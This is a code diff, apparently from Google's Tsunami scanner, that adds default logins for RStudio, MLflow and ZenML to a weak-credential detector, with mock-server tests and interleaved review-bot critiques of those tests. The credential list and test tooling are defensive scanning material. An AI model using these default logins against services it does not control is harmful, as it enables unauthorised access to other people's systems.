--- a/google/detectors/credentials/generic_weak_credential_detector/src/main/resources/detectors/credentials/genericweakcredentialdetector/data/service_default_credentials.textproto +++ b/google/detectors/credentials/generic_weak_credential_detector/src/main/resources/detectors/credentials/genericweakcredentialdetector/data/service_default_credentials.textproto @@ -55,8 +55,31 @@ service_default_credentials { default_usernames: "admin" default_passwords: "admin" } +service_default_credentials { + service_name: "rstudio" + default_usernames: "rstudio" + default_passwords: "rstudio" +} service_default_credentials { service_name: "rabbitmq" default_usernames: "guest" default_passwords: "guest" } + +service_default_credentials { + service_name: "mlflow" + default_usernames: "user_a" + default_passwords: "password_a" + default_usernames: "user_b" + default_passwords: "password_b" + default_usernames: "admin" + default_passwords: "password" + default_usernames: "username" + default_passwords: "password" +} + +service_default_credentials { + service_name: "zenml" + default_usernames: "default" + default_passwords: "" +} diff --git a/google/detectors/credentials/generic_weak_credential_detector/src/test/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/mlflow/MlFlowCredentialTesterTest.java b/google/detectors/credentials/generic_weak_credential_detector/src/test/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/mlflow/MlFlowCredentialTesterTest.java new file mode 100644 index 000000000..e6342a5c1 --- /dev/null +++ b/google/detectors/credentials/generic_weak_credential_detector/src/test/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/mlflow/MlFlowCredentialTesterTest.java 
@@ -0,0 +1,204 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.mlflow; + +import static com.google.common.truth.Truth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; +import static org.mockito.ArgumentMatchers.any; +import static org.mockito.Mockito.verifyNoInteractions; +import static org.mockito.Mockito.when; + +import com.google.common.collect.ImmutableList; +import com.google.inject.Guice; +import com.google.tsunami.common.net.db.ConnectionProviderInterface; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.provider.TestCredential; +import com.google.tsunami.proto.NetworkService; +import java.io.IOException; +import java.sql.Connection; +import java.util.Objects; +import java.util.Optional; +import javax.inject.Inject; +import okhttp3.mockwebserver.Dispatcher; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import okhttp3.mockwebserver.RecordedRequest; +import org.junit.Before; +import org.junit.Rule; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; +import org.mockito.Mock; +import org.mockito.junit.MockitoJUnit; +import org.mockito.junit.MockitoRule; + +/** Tests for {@link 
MlFlowCredentialTester}. */ +@RunWith(JUnit4.class) +public class MlFlowCredentialTesterTest { + @Rule public MockitoRule rule = MockitoJUnit.rule(); + @Mock private ConnectionProviderInterface mockConnectionProvider; + @Mock private Connection mockConnection; + @Inject private MlFlowCredentialTester tester; + private MockWebServer mockWebServer; + private static final TestCredential WEAK_CRED_1 = + TestCredential.create("admin", Optional.of("password")); + private static final TestCredential WEAK_CRED_2 = + TestCredential.create("username", Optional.of("password")); + private static final TestCredential WRONG_CRED_1 = + TestCredential.create("wrong", Optional.of("wrong")); + + // The base64 encoding of default authentication username:password pairs which the tester will + // send these headers to our mock webserver + private static final String WEAK_CRED_AUTH_1 = "basic dXNlcm5hbWU6cGFzc3dvcmQ="; + private static final String WEAK_CRED_AUTH_2 = "basic YWRtaW46cGFzc3dvcmQ="; + + @Before + public void setup() { + mockWebServer = new MockWebServer(); + Guice.createInjector(new HttpClientModule.Builder().build()).injectMembers(this); + } + + @Test + public void detect_weakCredentialsExists_returnsWeakCredentials() throws Exception { + startMockWebServer(); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setServiceName("mlflow") + .build(); + + assertThat(tester.testValidCredentials(targetNetworkService, ImmutableList.of(WEAK_CRED_1))) + .containsExactly(WEAK_CRED_1); + mockWebServer.shutdown(); + } + + @Test + public void detect_weakCredentialsExist_returnsFirstWeakCredentials() throws Exception { + startMockWebServer(); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setServiceName("mlflow") + .build(); + + assertThat( + 
tester.testValidCredentials( + targetNetworkService, ImmutableList.of(WEAK_CRED_1, WEAK_CRED_2))) + .containsExactly(WEAK_CRED_1); + } + + @Test + public void detect_mlflowService_canAccept() throws Exception { + startMockWebServer(); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setServiceName("mlflow") + .build(); + + assertThat(tester.canAccept(targetNetworkService)).isTrue(); + } + + @Test + public void detect_weakCredentialsExistAndMlflowInForeignLanguage_returnsFirstWeakCredentials() + throws Exception { + startMockWebServer(); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setServiceName("mlflow") + .build(); + + assertThat( + tester.testValidCredentials( + targetNetworkService, ImmutableList.of(WEAK_CRED_1, WEAK_CRED_2))) + .containsExactly(WEAK_CRED_1); + } + + @Test + public void detect_noWeakCredentials_returnsNoCredentials() throws Exception { + startMockWebServer(); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setServiceName("mlflow") + .build(); + assertThat(tester.testValidCredentials(targetNetworkService, ImmutableList.of(WRONG_CRED_1))) + .isEmpty(); + } + + @Test + public void detect_nonMlflowService_skips() throws Exception { + when(mockConnectionProvider.getConnection(any(), any(), any())).thenReturn(mockConnection); + NetworkService targetNetworkService = + NetworkService.newBuilder() + .setNetworkEndpoint(forHostnameAndPort("example.com", 8080)) + .setServiceName("http") + .build(); + + assertThat(tester.testValidCredentials(targetNetworkService, ImmutableList.of(WEAK_CRED_1))) + .isEmpty(); + verifyNoInteractions(mockConnectionProvider); + } + + private void 
startMockWebServer() throws IOException { + final Dispatcher dispatcher = + new Dispatcher() { + final MockResponse unauthorizedResponse = + new MockResponse() + .setResponseCode(401) + .setBody( + "You are not authenticated. " + + "Please see https://www.mlflow.org/docs/latest/auth/index.html" + + "#authenticating-to-mlflow " + + "on how to authenticate"); + + @Override + public MockResponse dispatch(RecordedRequest request) { + String authorizationHeader = request.getHeaders().get("Authorization"); + if (authorizationHeader == null) { + return unauthorizedResponse; + } + if (request.getPath().matches("/api/2.0/mlflow/users/get\\?.*") + && Objects.equals(request.getMethod(), "GET")) { + boolean isDefaultCredentials = + authorizationHeader.equals(WEAK_CRED_AUTH_1) + || authorizationHeader.equals(WEAK_CRED_AUTH_2); + if (isDefaultCredentials) { + return new MockResponse() + .setResponseCode(200) + .setBody( + "{\"user\":{\"experiment_permissions\":[],\"id\":1,\"is_admin\":true," + + "\"registered_model_permissions\":[]," + + "\"username\":\"admin\"}}"); + } else { + return unauthorizedResponse; + } + } + return new MockResponse().setResponseCode(404); + } + }; + mockWebServer.setDispatcher(dispatcher); + mockWebServer.start(); + mockWebServer.url("/"); + } +} diff --git a/google/detectors/credentials/generic_weak_credential_detector/src/test/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/rstudio/RStudioCredentialTesterTest.java b/google/detectors/credentials/generic_weak_credential_detector/src/test/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/rstudio/RStudioCredentialTesterTest.java new file mode 100644 index 000000000..fbf4caccd --- /dev/null +++ b/google/detectors/credentials/generic_weak_credential_detector/src/test/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/rstudio/RStudioCredentialTesterTest.java 
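Review bot: `detect_nonMlflowService_skips` calls `tester.testValidCredentials` against `example.com:8080`, and since `testValidCredentials` in MlFlowCredentialTester never consults `canAccept`, the test appears to issue a real outbound HTTP request and passes only because that request does not return a user object. The `mockConnectionProvider` stubbing and the `verifyNoInteractions` check do not involve this tester, which is constructed from an `HttpClient` alone. Asserting `assertThat(tester.canAccept(targetNetworkService)).isFalse();` would test the skip without network access. `WEAK_CRED_AUTH_1` and `WEAK_CRED_AUTH_2` are also numbered opposite to `WEAK_CRED_1`/`WEAK_CRED_2` (the first decodes to `username:password`, the second to `admin:password`). No test covers the empty-credential branch of `sendRequestWithCredentials`, and only the first test calls `mockWebServer.shutdown()`.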
@@ -0,0 +1,209 @@
+/*
+ * Copyright 2023 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.rstudio;
+
+import static com.google.common.truth.Truth.assertThat;
+import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort;
+
+import com.google.common.collect.ImmutableList;
+import com.google.inject.Guice;
+import com.google.tsunami.common.net.http.HttpClientModule;
+import com.google.tsunami.common.net.http.HttpStatus;
+import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.provider.TestCredential;
+import com.google.tsunami.proto.NetworkService;
+import com.google.tsunami.proto.ServiceContext;
+import com.google.tsunami.proto.Software;
+import com.google.tsunami.proto.WebServiceContext;
+import java.io.IOException;
+import java.nio.charset.StandardCharsets;
+import java.security.InvalidKeyException;
+import java.security.KeyPair;
+import java.security.KeyPairGenerator;
+import java.security.NoSuchAlgorithmException;
+import java.security.interfaces.RSAPrivateKey;
+import java.security.interfaces.RSAPublicKey;
+import java.util.Base64;
+import java.util.Optional;
+import javax.crypto.BadPaddingException;
+import javax.crypto.Cipher;
+import javax.crypto.IllegalBlockSizeException;
+import javax.crypto.NoSuchPaddingException;
+import javax.inject.Inject;
+import okhttp3.mockwebserver.Dispatcher;
+import okhttp3.mockwebserver.MockResponse;
+import okhttp3.mockwebserver.MockWebServer;
+import okhttp3.mockwebserver.RecordedRequest;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import org.junit.runners.JUnit4;
+
+/** Tests for {@link RStudioCredentialTester}. */
+@RunWith(JUnit4.class)
+public class RStudioCredentialTesterTest {
+ @Inject private RStudioCredentialTester tester;
+ private MockWebServer mockWebServer;
+ private static final TestCredential WEAK_CRED_1 =
+ TestCredential.create("user", Optional.of("1234"));
+ private static final TestCredential WEAK_CRED_2 =
+ TestCredential.create("root", Optional.of("pass"));
+ private static final TestCredential WRONG_CRED_1 =
+ TestCredential.create("wrong", Optional.of("pass"));
+ private static final ServiceContext.Builder RSTUDIO_SERVICE_CONTEXT =
+ ServiceContext.newBuilder()
+ .setWebServiceContext(
+ WebServiceContext.newBuilder().setSoftware(Software.newBuilder().setName("rstudio")));
+
+ @Before
+ public void setup() {
+ mockWebServer = new MockWebServer();
+ Guice.createInjector(new HttpClientModule.Builder().build()).injectMembers(this);
+ }
+
+ // TODO: fix the intermittent test failure
+ // @Test
+ // public void detect_weakCredentialsExists_returnsWeakCredentials() throws Exception {
+ // startMockWebServer("/", "");
+ // NetworkService targetNetworkService =
+ // NetworkService.newBuilder()
+ // .setNetworkEndpoint(
+ // forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort()))
+ // .setServiceName("http")
+ // .setServiceContext(RSTUDIO_SERVICE_CONTEXT)
+ // .setSoftware(Software.newBuilder().setName("http"))
+ // .build();
+ // assertThat(tester.testValidCredentials(targetNetworkService, ImmutableList.of(WEAK_CRED_1)))
+ // .containsExactly(WEAK_CRED_1);
+ // mockWebServer.shutdown();
+ // }
+ //
+ // TODO: fix the intermittent test failure
+ // @Test
+ // public void detect_weakCredentialsExist_returnsFirstWeakCredentials() throws Exception {
+ // startMockWebServer("/", "");
+ // NetworkService targetNetworkService =
+ // NetworkService.newBuilder()
+ // .setNetworkEndpoint(
+ // forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort()))
+ // .setServiceName("http")
+ // .setServiceContext(RSTUDIO_SERVICE_CONTEXT)
+ // .build();
+
+ // assertThat(
+ // tester.testValidCredentials(
+ // targetNetworkService, ImmutableList.of(WEAK_CRED_1, WEAK_CRED_2)))
+ // .containsExactly(WEAK_CRED_1);
+ // mockWebServer.shutdown();
+ // }
+
+ @Test
+ public void detect_noWeakCredentials_returnsNoCredentials() throws Exception {
+ startMockWebServer("/", "");
+ NetworkService targetNetworkService =
+ NetworkService.newBuilder()
+ .setNetworkEndpoint(
+ forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort()))
+ .setServiceName("http")
+ .setServiceContext(RSTUDIO_SERVICE_CONTEXT)
+ .build();
+
+ assertThat(tester.testValidCredentials(targetNetworkService, ImmutableList.of(WRONG_CRED_1)))
+ .isEmpty();
+ mockWebServer.shutdown();
+ }
+
+ private void startMockWebServer(String url, String response) throws IOException {
+ mockWebServer.setDispatcher(new RespondUserInfoResponseDispatcher(response));
+ mockWebServer.start();
+ mockWebServer.url(url);
+ }
+
+ static final class RespondUserInfoResponseDispatcher extends Dispatcher {
+ private KeyPair pair;
+
+ RespondUserInfoResponseDispatcher(String authenticatedUserResponse) {
+ try {
+ KeyPairGenerator keyGen = KeyPairGenerator.getInstance("RSA");
+ keyGen.initialize(2048);
+ this.pair = keyGen.generateKeyPair();
+ } catch (NoSuchAlgorithmException e) {
+ this.pair = null;
+ }
+ }
+
+ @Override
+ public MockResponse dispatch(RecordedRequest recordedRequest) {
+ try {
+ var isUserEndpoint = recordedRequest.getPath().startsWith("/auth-do-sign-in");
+ var isPublicKeyEndpoint = recordedRequest.getPath().startsWith("/auth-public-key");
+
+ RSAPrivateKey privateKey = (RSAPrivateKey) this.pair.getPrivate();
+ RSAPublicKey publicKey = (RSAPublicKey) this.pair.getPublic();
+
+ if (isUserEndpoint) {
+ var ciphertext =
+ recordedRequest
+ .getBody()
+ .readUtf8()
+ .toString()
+ .split("&v=")[1]
+ .trim()
+ .replaceAll("\\%2b", "+")
+ .replaceAll("\\%3d", "=");
+ Cipher cipher = Cipher.getInstance("RSA/ECB/PKCS1Padding");
+ cipher.init(Cipher.DECRYPT_MODE, privateKey);
+
+ byte[] b64Decoded = Base64.getDecoder().decode(ciphertext);
+ byte[] cipherData = cipher.doFinal(b64Decoded);
+
+ String creds = new String(cipherData, StandardCharsets.UTF_8);
+
+ String username = creds.toString().split("\n")[0].trim();
+ String password = creds.toString().split("\n")[1].trim();
+ boolean hasWeakCred1 =
+ username.equals(WEAK_CRED_1.username())
+ && password.equals(WEAK_CRED_1.password().get());
+ boolean hasWeakCred2 =
+ username.equals(WEAK_CRED_2.username())
+ && password.equals(WEAK_CRED_2.password().get());
+ if (hasWeakCred1 || hasWeakCred2) {
+ return new MockResponse()
+ .setResponseCode(HttpStatus.OK.code())
+ .setHeader("Set-Cookie", "user-id=" + username + "|");
+ }
+ } else if (isPublicKeyEndpoint) {
+ StringBuilder sb = new StringBuilder();
+ for (byte b : publicKey.getPublicExponent().toByteArray()) {
+ sb.append(String.format("%02X", b));
+ }
+ sb.append(":");
+ for (byte b : publicKey.getModulus().toByteArray()) {
+ sb.append(String.format("%02X", b));
+ }
+ return new MockResponse().setResponseCode(HttpStatus.OK.code()).setBody(sb.toString());
+ }
+ return new MockResponse().setResponseCode(HttpStatus.UNAUTHORIZED.code());
+ } catch (NoSuchAlgorithmException
+ | NoSuchPaddingException
+ | InvalidKeyException
+ | IllegalBlockSizeException
+ | BadPaddingException e) {
+ return new MockResponse().setResponseCode(HttpStatus.UNAUTHORIZED.code());
+ }
+ }
+ }
+}
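Review bot: With both positive cases commented out, the only test that still runs is `detect_noWeakCredentials_returnsNoCredentials`, so nothing in this file shows that the RStudio tester can ever report a weak credential; a tester that always returned an empty list would pass. A likely source of the flakiness noted in the TODOs (inferred, since the tester's request encoding is not visible here) is the hand-rolled decoding in `dispatch`: it maps only lowercase `%2b` and `%3d`, leaves `%2F` and uppercase escapes untouched, and an `IllegalArgumentException` from `Base64.getDecoder().decode(ciphertext)` is not in the multi-catch, so it escapes the dispatcher instead of producing a 401. I would decode the `v` parameter with `URLDecoder.decode(value, StandardCharsets.UTF_8)`, add `| IllegalArgumentException` to the catch, and then re-enable the two tests. The constructor also sets `this.pair = null` on failure, which `dispatch` dereferences unconditionally, and its `authenticatedUserResponse` parameter is never used.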
diff --git a/google/detectors/credentials/generic_weak_credential_detector/src/test/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/zenml/ZenMlCredentialTesterTest.java b/google/detectors/credentials/generic_weak_credential_detector/src/test/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/zenml/ZenMlCredentialTesterTest.java
new file mode 100644
index 000000000..9513d5c3b
--- /dev/null
+++ b/google/detectors/credentials/generic_weak_credential_detector/src/test/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/zenml/ZenMlCredentialTesterTest.java
@@ -0,0 +1,196 @@
+/*
+ * Copyright 2023 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.testers.zenml;
+
+import static com.google.common.truth.Truth.assertThat;
+import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort;
+import static org.mockito.ArgumentMatchers.any;
+import static org.mockito.Mockito.verifyNoInteractions;
+import static org.mockito.Mockito.when;
+
+import com.google.common.collect.ImmutableList;
+import com.google.inject.Guice;
+import com.google.tsunami.common.net.db.ConnectionProviderInterface;
+import com.google.tsunami.common.net.http.HttpClientModule;
+import com.google.tsunami.plugins.detectors.credentials.genericweakcredentialdetector.provider.TestCredential;
+import com.google.tsunami.proto.NetworkService;
+import java.io.IOException;
+import java.nio.charset.StandardCharsets;
+import java.sql.Connection;
+import java.util.Objects;
+import java.util.Optional;
+import javax.inject.Inject;
+import okhttp3.mockwebserver.Dispatcher;
+import okhttp3.mockwebserver.MockResponse;
+import okhttp3.mockwebserver.MockWebServer;
+import okhttp3.mockwebserver.RecordedRequest;
+import org.junit.Before;
+import org.junit.Rule;
+import org.junit.runner.RunWith;
+import org.junit.runners.JUnit4;
+import org.junit.Test;
+import org.mockito.junit.MockitoJUnit;
+import org.mockito.junit.MockitoRule;
+import org.mockito.Mock;
+
+/** Tests for {@link ZenMlCredentialTester}. */
+@RunWith(JUnit4.class)
+public class ZenMlCredentialTesterTest {
+ @Rule public MockitoRule rule = MockitoJUnit.rule();
+ @Mock private ConnectionProviderInterface mockConnectionProvider;
+ @Mock private Connection mockConnection;
+ @Inject private ZenMlCredentialTester tester;
+ private MockWebServer mockWebServer;
+ private static final TestCredential WEAK_CRED_1 =
+ TestCredential.create("default", Optional.of(""));
+ private static final TestCredential WRONG_CRED_1 =
+ TestCredential.create("wrong", Optional.of("wrong"));
+
+ // the default username and password value for an insecure zenml instance
+ private static final String DEFAULT_USERNAME = "default";
+ private static final String DEFAULT_PASSWORD = "";
+
+ @Before
+ public void setup() {
+ mockWebServer = new MockWebServer();
+ Guice.createInjector(new HttpClientModule.Builder().build()).injectMembers(this);
+ }
+
+ @Test
+ public void detect_weakCredentialsExists_returnsWeakCredentials() throws Exception {
+ startMockWebServer();
+ NetworkService targetNetworkService =
+ NetworkService.newBuilder()
+ .setNetworkEndpoint(
+ forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort()))
+ .setServiceName("zenml")
+ .build();
+
+ assertThat(tester.testValidCredentials(targetNetworkService, ImmutableList.of(WEAK_CRED_1)))
+ .containsExactly(WEAK_CRED_1);
+ mockWebServer.shutdown();
+ }
+
+ @Test
+ public void detect_weakCredentialsExist_returnsFirstWeakCredentials() throws Exception {
+ startMockWebServer();
+ NetworkService targetNetworkService =
+ NetworkService.newBuilder()
+ .setNetworkEndpoint(
+ forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort()))
+ .setServiceName("zenml")
+ .build();
+
+ assertThat(tester.testValidCredentials(targetNetworkService, ImmutableList.of(WEAK_CRED_1)))
+ .containsExactly(WEAK_CRED_1);
+ }
+
+ @Test
+ public void detect_zenmlService_canAccept() throws Exception {
+ startMockWebServer();
+ NetworkService targetNetworkService =
+ NetworkService.newBuilder()
+ .setNetworkEndpoint(
+ forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort()))
+ .setServiceName("zenml")
+ .build();
+
+ assertThat(tester.canAccept(targetNetworkService)).isTrue();
+ }
+
+ @Test
+ public void detect_weakCredentialsExistAndZenmlInForeignLanguage_returnsFirstWeakCredentials()
+ throws Exception {
+ startMockWebServer();
+ NetworkService targetNetworkService =
+ NetworkService.newBuilder()
+ .setNetworkEndpoint(
+ forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort()))
+ .setServiceName("zenml")
+ .build();
+
+ assertThat(tester.testValidCredentials(targetNetworkService, ImmutableList.of(WEAK_CRED_1)))
+ .containsExactly(WEAK_CRED_1);
+ }
+
+ @Test
+ public void detect_noWeakCredentials_returnsNoCredentials() throws Exception {
+ startMockWebServer();
+ NetworkService targetNetworkService =
+ NetworkService.newBuilder()
+ .setNetworkEndpoint(
+ forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort()))
+ .setServiceName("zenml")
+ .build();
+ assertThat(tester.testValidCredentials(targetNetworkService, ImmutableList.of(WRONG_CRED_1)))
+ .isEmpty();
+ }
+
+ @Test
+ public void detect_nonZenmlService_skips() throws Exception {
+ when(mockConnectionProvider.getConnection(any(), any(), any())).thenReturn(mockConnection);
+ NetworkService targetNetworkService =
+ NetworkService.newBuilder()
+ .setNetworkEndpoint(forHostnameAndPort("example.com", 8080))
+ .setServiceName("http")
+ .build();
+
+ assertThat(tester.testValidCredentials(targetNetworkService, ImmutableList.of(WEAK_CRED_1)))
+ .isEmpty();
+ verifyNoInteractions(mockConnectionProvider);
+ }
+
+ private void startMockWebServer() throws IOException {
+ final Dispatcher dispatcher =
+ new Dispatcher() {
+ final MockResponse unauthorizedResponse =
+ new MockResponse()
+ .setResponseCode(401)
+ .setBody(
+ "{\"detail\":[\"AuthorizationException\","
+ + "\"Authentication error: invalid username or password\"]}");
+
+ @Override
+ public MockResponse dispatch(RecordedRequest request) {
+ if (request.getPath().matches("/login") && Objects.equals(request.getMethod(), "GET")) {
+ return new MockResponse()
+ .setResponseCode(200)
+ .setBody(" ZenML Dashboard ");
+ }
+ if (request.getPath().matches("/api/v1/login")
+ && Objects.equals(request.getMethod(), "POST")
+ && request
+ .getBody()
+ .readString(StandardCharsets.UTF_8)
+ .contains(
+ String.format(
+ "username=%s&password=%s", DEFAULT_USERNAME, DEFAULT_PASSWORD))) {
+ return new MockResponse()
+ .setResponseCode(200)
+ .setBody(
+ "{\"access_token\":\"An AccessToken\",\"token_type\":\"bearer\","
+ + "\"expires_in\":null,\"refresh_token\":null,\"scope\":null}");
+ } else {
+ return unauthorizedResponse;
+ }
+ }
+ };
+ mockWebServer.setDispatcher(dispatcher);
+ mockWebServer.start();
+ mockWebServer.url("/");
+ }
+}
diff --git a/google/detectors/directorytraversal/cve202017519/gradle/wrapper/gradle-wrapper.jar b/google/detectors/directorytraversal/cve202017519/gradle/wrapper/gradle-wrapper.jar
index 62d4c0535..d64cd4917 100644
Binary files a/google/detectors/directorytraversal/cve202017519/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/directorytraversal/cve202017519/gradle/wrapper/gradle-wrapper.jar differ
diff --git a/google/detectors/directorytraversal/cve202017519/gradle/wrapper/gradle-wrapper.properties b/google/detectors/directorytraversal/cve202017519/gradle/wrapper/gradle-wrapper.properties
index 622ab64a3..d04736436 100644
--- a/google/detectors/directorytraversal/cve202017519/gradle/wrapper/gradle-wrapper.properties
+++ b/google/detectors/directorytraversal/cve202017519/gradle/wrapper/gradle-wrapper.properties
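Review bot: The mock login check in `dispatch` accepts any password for the `default` user, because with an empty `DEFAULT_PASSWORD` the `.contains(String.format("username=%s&password=%s", ...))` test reduces to the substring `username=default&password=`. The only negative case, `WRONG_CRED_1`, changes the username, so a tester that submitted the wrong password would still pass these tests as a confirmed weak credential. I would match the password field exactly, for example `body.matches("(.*&)?username=default&password=(&.*)?")` (the exact form body the tester sends is not visible here, so adjust to it), and add a negative credential such as `TestCredential.create("default", Optional.of("wrong"))`. Separately, `detect_weakCredentialsExist_returnsFirstWeakCredentials` and the `...InForeignLanguage` test repeat the first test's body with a single credential, and `verifyNoInteractions(mockConnectionProvider)` cannot fail as far as this file shows, since the mock is never bound into the injector.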
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/directorytraversal/cve202017519/gradlew b/google/detectors/directorytraversal/cve202017519/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/directorytraversal/cve202017519/gradlew +++ b/google/detectors/directorytraversal/cve202017519/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | 